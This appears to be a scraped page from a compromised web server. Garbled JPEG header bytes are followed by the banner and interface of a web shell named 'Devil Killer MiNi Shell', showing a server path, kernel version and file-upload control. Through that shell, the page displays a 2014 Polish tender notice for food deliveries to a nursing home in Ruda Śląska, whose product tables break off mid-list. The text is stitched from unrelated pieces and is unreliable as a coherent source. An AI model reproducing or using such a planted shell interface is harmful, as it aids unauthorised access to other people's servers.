JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140523/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140523/175330-N-2014.html

<p class="kh_header"><b>Ruda Śląska: Dostawa artykułów żywnościowych 
dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej</b><br>
<b>Numer ogłoszenia: 175330 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej , ul. Puszkina 7, 41-704 Ruda Śląska, woj. śląskie, tel. 032 2481774, faks 032 2481774 w. 33.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych 
dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych z podziałem na wyszczególnione poniżej pakiety:

Pakiet nr 1	Dostawa artykułów nabiałowych 
Pakiet nr 2	Dostawa pieczywa 
Pakiet nr 3	Dostawa wypieków cukierniczych 
Pakiet nr 4	Dostawa warzyw świeżych i suszonych 
Pakiet nr 5	Dostawa owoców świeżych i suszonych 
Pakiet nr 6	Dostawa warzyw i owoców mrożonych 
Pakiet nr 7	Dostawa ryb mrożonych, świeżych, wędzonych i przetworów rybnych Pakiet nr 8 	Dostawa mięsa wieprzowego i wołowego oraz podrobów 
Pakiet nr 9 	Dostawa mięsa i podrobów drobiowych 
Pakiet nr 10 Dostawa wędlin 
Pakiet nr 11 Dostawa jaj kurzych 
Pakiet nr 12	Dostawa czekolad i wyrobów cukierniczych 
Pakiet nr 13 Dostawa napojów bezalkoholowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.43.00.00-1, 15.89.80.00-9, 15.81.00.00-9, 15.81.00.00-9, 03.22.00.00-9, 03.21.00.00-6, 03.22.00.00-9, 15.33.24.10-1, 15.33.11.70-9, 15.20.00.00-0, 15.22.00.00-6, 15.21.11.00-1, 15.11.00.00-2, 15.11.40.00-0, 15.11.20.00-6, 15.11.23.00-9, 15.13.11.30-5, 03.14.25.00-3, 15.84.00.00-8, 15.98.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dps-senior.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Senior w Rudzie Śląskiej
przy ulicy Puszkina 7 w Dziale Techniczno - Zaopatrzeniowym, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2014 godzina 11:30, miejsce: Dom Pomocy Społecznej Senior w Rudzie Śląskiej
Ruda Ślaska 41-704, ul. Puszkina 7, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW NABIAŁOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana wielkość
opakowania	Jm	Orientacyjna ilość
zamówienia*	Cena jedn. netto	
Wartość netto	
Stawka 
Vat	
Wartość brutto **
a	b	c	d	e	f	g	h	i
1	Deser wielosmakowy: ryżowy, z kaszą manną 	120-200g	kg	60				
2	Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	120-200g	kg	150				
3	 Jogurt owocowy 	125-200g	kg	260				
4	Jogurt naturalny 	150-200g	kg	140				
5	Maślanka naturalna karton	1L	l	300				
6	Maślanka owocowa	250-500g	kg	40				
7	Kefir naturalny	150-200g	kg	55				
8	Margaryna do smarowania pieczywa z dodatkiem masła	500g	kg	10				
9	Margaryna mleczna zwykła 	250g	kg	140				
10	Masło extra 82% 	200g	kg	800				
11	Mix tłuszczowy do smarowania min. 75 % tłuszczu (zawartość  tłuszczu mlecznego min. 12%)	200-250g	kg	100				
12	Mleko 2%  	10-20l 	l	5500				
13	Mleko 2%  	1l	l	300				
14	Ser biały półtłusty - krajanka	kg	kg	280				
15	Ser podpuszczkowy pleśniowy 	100-200g	kg	7				
16	Ser domowy z kminkiem	150-200g	kg	80				
17	Ser wielosmakowy fromage	75-100g	kg	45				
18	Ser żółty łagodny 45%	1000-3000g	kg	100				
19	Ser żółty wędzony	1000-2000g	kg	10				
20	Serek topiony kremowy - kostka,27% tł.(pochodzenia zwierzęcego)-różne smaki	100g	kg	90				
21	Serek topiony kremowy wędzony 	1000-2000g	kg	50				
22	Serek homogenizowany różne smaki	100-200g	kg	250				
23	Serek naturalny homogenizowany	100-200g	kg	65				
24	Serek kanapkowy twarożkowy, kremowy - różne smaki	100-150g	kg	100				
25	Serek twarożkowy wiejski ziarnisty	200g	kg	150				
26	Śmietanka do kawy 10% tłuszczu	10 g	szt.	1200				
27	Śmietana spożywcza słodka 18% tłuszczu 	250-500ml	l	170				
28	Śmietana 12% tłuszczu homogenizowana 	180g-400g	kg	10				
29	Śmietana 30%tłuszczu- kremówka	200-500g	kg	15				
30	Smalec wieprzowy kostka	200-250g	kg	25				
31	Napój probiotyczny 	100g	kg	5				
32	Mleczko smakowe	200g	szt.	20				
33	Drożdże piekarnicze świeże	42-100g	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA PIECZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

L.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna
ilość zamówienia*	Cena jedn. netto	

Wartość netto	

Stawka Vat	Wartość brutto **
a	b	c	d	e	f	g	h	i
1
	Chleb  pszenno- żytni krojony	900-1000g	kg	6000				
2
	Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham, karmelowy, cebulowy, razowy itd.)	400-500g	kg	680				
3	Wek krojony	300g-500g	kg	85				
4	Bułka kajzerka	50g	kg	720				
5	Pieczywo mleczne (rogal, chałka)	60g-100g	kg	30				
6	Bułka mleczna	60g-80g	kg	80				
7	Groszek ptysiowy		kg	2				
8	Bułka tarta	400-500g	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA WYPIEKÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka VAT	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Rogalik z różnymi nadzieniami(budyń, śmietana, czekolada itp.)	70-100g	kg	100				
2	Rogalik z różnymi nadzieniami z ograniczoną ilością cukru	70-100g	kg	30				
3	Drożdżówka wielosmakowa (ser-mak, ser-marmolada )	100-120g	kg	45				
4	Drożdżówka z ograniczoną ilością cukru	100-120g	kg	15				
5	Jagodzianka	70-100g	kg	45				
6	Jagodzianka z ograniczoną ilością cukru	70-100g	kg	15				
7	Pączki z różnymi nadzieniami (śmietana, marmolada, budyń, adwokat itd..)	100g	kg	120				
8	Pączki z ograniczoną ilością cukru, bez polewy	100g	kg	30				
9	Ciasto tortowe z kremem (na bazie budyniu) z owocami, galaretką owocową i bitą śmietaną		kg	30				
10	Tort okazjonalny
- 100 lat urodzin
- jubileusz 25 lecia
(krem na bazie budyniu, owoce, galaretka, owocowa, bita śmietana)		kg	12				
11	Ciastka W-Z	80-120g	kg	15				
12	Sernik 
na drożdżowym spodzie	 	kg	50				
13	Ciasto drożdżowe z posypką	 	kg	30				
14	Ciasto z owocami 
na drożdżowym spodzie 	 	kg	70				
15	Ciasto z owocami 
na piaskowym spodzie	 	kg	100				
16	Szarlotka	 	kg	50				
17	Sernik na cieście ucieranym	 	kg	50				
18	Rolada z bitą śmietaną	 	kg	25				
19	Ptysie miniaturki ze śmietaną, budyniem 	 	kg	10				
20	Ciasteczka kokosanki	 	kg	30				
21	Piernik do moczki		kg	3				
22	Piernik z bakaliami 	 	kg	15				
23	Babeczki piaskowe	70-100g	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA




Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto **
a	b	c	d	e	f	g	h	i
1	Buraki 	 	kg	400				
2	Botwinka 	 	kg	5				
3	Brokuły różyczka 	 	kg	10				
4	Cebula	 	kg	240				
5	Cebulka zielona, szczypiorek (VII-X m-c)	 	kg	25				
6	Cebulka zielona, szczypiorek- (XI-XII m-c)	 	kg	10				
7	Czosnek polski	 	kg	14				
8	Kalafior różyczka 	 	kg	155				
9	Kalarepa	 	kg	12				
10	Kapusta biała	 	kg	300				
11	Kapusta biała młoda 	 	kg	170				
12	Kapusta czerwona	 	kg	200				
13	Kapusta czerwona młoda 	 	kg	90				
14	Kapusta kiszona 	 	kg	360				
15	Kapusta pekińska	 	kg	60				
16	Kapusta włoska	 	kg	70				
17	Kapusta włoska młoda	 	kg	10				
18	Koperek zielony (VII-X m-c)	 	kg	30				
19	Koperek zielony (XI-XII m-c)	 	kg	15				
20	Ogórki kiszone	 	kg	70				
21	Ogórki małosolne	 	kg	25				
22	Ogórki zielone (VII-X m-c)	 	kg	140				
23	Ogórki zielone  (XI-XII m-c)	 	kg	20				
24	Papryka czerwona 	 	kg	15				
25	Pieczarki	 	kg	110				
26	Pietruszka korzeń	 	kg	350				
27	Pietruszka zielona (VII-X m-c)	 	kg	50				
28	Pietruszka zielona (XI-XII m-c)	 	kg	25				
30	Pomidory (VII-X m-c)	 	kg	250				
31	Pomidory (XI-XII m-c)	 	kg	70				
32	Por	 	kg	80				
33	Rzodkiewka (VII-X m-c)	100g	pęczek	60				
34	Rzodkiewka (XI-XII  m-c)	100g	pęczek	20				
36	Sałata zielona (VII-X m-c)	300g	szt	30				
37	Sałata zielona (XI-XII m-c)	200g	szt	3				
38	Seler korzeń	 	kg	400				
39	Marchew	 	kg	1100				
40	Ziemniaki 	 	kg	7500				
41	Ziemniaki młode (VII m-c)	 	kg	1600				
42	Fasola kolorowa	 	kg	8				
43	Fasola Jaś	 	kg	25				
44	Fasolka szparagowa		kg	60				
45	Groch łuszczony	 	kg	20				
46	Pasternak		kg	1				
47	Mak niebieski	 	kg	8				
49	Grzyby suszone	 	kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.21.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DOSTAWA OWOCÓW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


 
Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Arbuz		kg	250				
2	Banany	200g/szt	kg	900				
3	Brzoskwinia 	150g/szt	kg	100				
4	Cytryny		kg	1				
5	Czereśnie		kg	50				
6	Grapefruit	300-400g/szt	kg	90				
7	Jabłka		kg	500				
8	Jabłka deserowe 	200g/szt	kg	500				
9	Jagody		kg	12				
10	Morele		kg	50				
11	Mandarynki	80-100g/szt	kg	150				
12	Nektaryny	150g/szt	kg	15				
13	Owoce kiwi	100-120g/szt	kg	60				
14	Pomarańcze	200g/szt	kg	280				
15	Truskawki świeże		kg	20				
16	Śliwki		kg	250				
17	Śliwki deserowe		kg	170				
18	Winogrona deserowe (VII-X)		kg	140				
19	Winogrona deserowe (XI-XII)		kg	10				
20	Wiśnie		kg	50				
21	Rabarbar		kg	100				
22	Gruszki deserowe		kg	80				
23	Gruszki suszone		kg	2,5				
24	Śliwki suszone, bez pestek		kg	6				
25	Jabłka suszone		kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DOSTAWA WARZYW I OWOCÓW MROŻONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia*	Jedn. cena netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Brokuły 	450g	kg	2				
2	Brokuły 	2000-2500g	kg	60				
3	Brukselka	450g	kg	2				
4	Brukselka	2000-2500g	kg	30				
5	Kalafior	450g	kg	2				
6	Kalafior	2000-2500g	kg	65				
7	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	450g	kg	5				
8	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	2000-2500g	kg	460				
9	Szpinak	450g	kg	5				
10	Szpinak	2000-2500g	kg	120				
11	Truskawki	450g	kg	2				
12	Truskawki	2000-2500g	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DOSTAWA RYB MROŻONYCH, ŚWIEŻYCH, WĘDZONYCH I PRZETWORÓW RYBNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Filety z zielonego śledzia	 	kg	80				
2	Filety z mintaja płaty SHP	 	kg	20				
3	Filety z dorsza płaty, b/skóry, SHP	 	kg	40				
4	Filet z pangi trymowanej płaty, SHP	 	kg	220				
5	Filety z matiasa b/skóry solone	 	kg	80				
6	Filety z matiasa b/skóry solone	100-900g	kg	5				
7	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	 1000-3000g	kg	27				
8	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5				
9	Sałatka z filetów śledziowych
w majonezie 	 1000-3000g	kg	35				
10	Sałatka z filetów śledziowych 
w majonezie 	100-900g	kg	4				
11	Sałatka -krajanka z filetów śledziowych w oleju z różnymi dodatkami (masa netto bez zalewy)	 1000-3000g	kg	35				
12	Sałatka - krajanka z filetów śledziowych w oleju z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5				
13	Koreczki śledziowe z różnymi dodatkami(masa netto bez zalewy)	1000-3000g	kg	15				
14	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5				
15	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	1000-3000g	kg	20				
16	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	100-900g	kg	7				
17	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	 1000-3000g	kg	35				
18	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	50-200g	kg	5				
19	Płaty śledziowe marynowane (masa netto bez zalewy)	1000-4000g	kg	40				
20	Płaty śledziowe marynowane (masa netto bez zalewy)	100-900g	kg	3				
21	Makrela wędzona ,tusza	 	kg	180				
22	Szproty wędzone	 	kg	20				
23	Paprykarz#	100-400g	kg	50				
24	Szproty w oleju 	150-200g	kg	40				
25	Tuńczyk w oleju - kawałki	150-200g	kg	30				
26	Śledzie w oleju  o zaw.min.60% mięsa rybnego 	150-200g	kg	10				
27	Śledzie w pomidorach o zaw. min. 60% mięsa rybnego.	150-200g	kg	10				
28	Karp świeży patroszony bez głowy-płat		kg	30				
29	Ryba w galarecie	150-200g	kg	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6, 15.21.11.00-1, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość 
netto	Stawka Vat	Wartość 
brutto**
a	b	c	d	e	f	g	h
1	Boczek wieprzowy bez kości -świeży	kg	8				
2	Flaki wołowe parzone, cięte 	kg	40				
3	Karczek wieprzowy bez kości - świeży	kg	30				
4	Łopatka wieprzowa bez kości - świeża	kg	700				
5	Mięso mielone wieprzowo-wołowe - świeże	kg	20				
6	Nóżki wieprzowe - świeże	kg	50				
7	Ozory wieprzowe - świeże	kg	45				
8	Płuca wieprzowe - świeże	kg	20				
9	Schab wieprzowy bez kości - świeży	kg	220				
10	Słonina mielona - świeża	kg	30				
11	Wołowe ekstra bez kości - świeże	kg	20				
12	Wołowe z kością, antrykot - świeże	kg	140				
13	Żeberka wieprzowe, paski - świeże	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana waga jednostkowa	Jm.	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Kurczaki świeże	1300 -1700g	kg	90				

2	Porcje rosołowe mrożone -paczkowane	500g -1500g	kg	300				
3	Serca z indyka świeże 		kg	30				
4	Udka z kurczaka, ćwiartki - świeże	350-400g	kg	50				
5	Wątróbka z kurczaka -świeża 		kg	70				
6	Żołądki z indyka - świeże 		kg	40				
7	Filety z kurczaka - świeże		kg	100				
8	Filety z indyka - świeże		kg	30				
9	Podudzie z kurczaka - świeże	150g-180g	kg	250				
